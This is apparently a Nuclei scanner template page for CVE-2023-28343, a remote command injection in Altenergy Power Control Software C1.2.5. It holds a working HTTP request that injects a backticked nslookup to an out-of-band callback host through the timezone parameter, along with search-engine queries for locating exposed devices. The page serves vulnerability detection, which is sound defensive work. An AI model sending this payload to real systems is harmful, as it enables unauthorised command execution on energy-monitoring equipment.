Skip to content
Nuclei Templates

Altenergy Power Control Software C1.2.5 - Remote Command Injection

ID: CVE-2023-28343

Severity: critical

Author: pikpikcu

Tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems

Description

Section titled “Description”

Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.

YAML Source

Section titled “YAML Source”
id: CVE-2023-28343


info:
  name: Altenergy Power Control Software C1.2.5 - Remote Command Injection
  author: pikpikcu
  severity: critical
  description: |
    Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability.
  reference:
    - https://github.com/ahmedalroky/Disclosures/blob/main/apesystems/os_command_injection.md
    - https://apsystems.com
    - http://packetstormsecurity.com/files/171775/Altenergy-Power-Control-Software-C1.2.5-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-28343
    - https://github.com/hba343434/CVE-2023-28343
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-28343
    cwe-id: CWE-78
    epss-score: 0.84636
    epss-percentile: 0.98506
    cpe: cpe:2.3:o:apsystems:energy_communication_unit_firmware:c1.2.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apsystems
    product: energy_communication_unit_firmware
    shodan-query:
      - title:"Altenergy Power Control Software"
      - http.title:"altenergy power control software"
    fofa-query: title="altenergy power control software"
    google-query:
      - intitle:"Altenergy Power Control Software"
      - intitle:"altenergy power control software"
  tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems


http:
  - raw:
      - |
        POST /index.php/management/set_timezone HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Accept-Encoding: gzip, deflate
        Referer: {{RootURL}}/index.php/management/datetime


        timezone=`nslookup {{interactsh-url}}`


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"


      - type: word
        part: body
        words:
          - "Time Zone updated successfully"


      - type: word
        part: header
        words:
          - "text/html"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022047c0089e29b0ce3985c14afd3101c108554dfcc51ca71be457c96cef7dbd3c2f0221009c2f8ce7ea0fd409df3eeba6aaa31158f4d7cdaff1981445aed67750a124a459:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-28343.yaml"

View on Github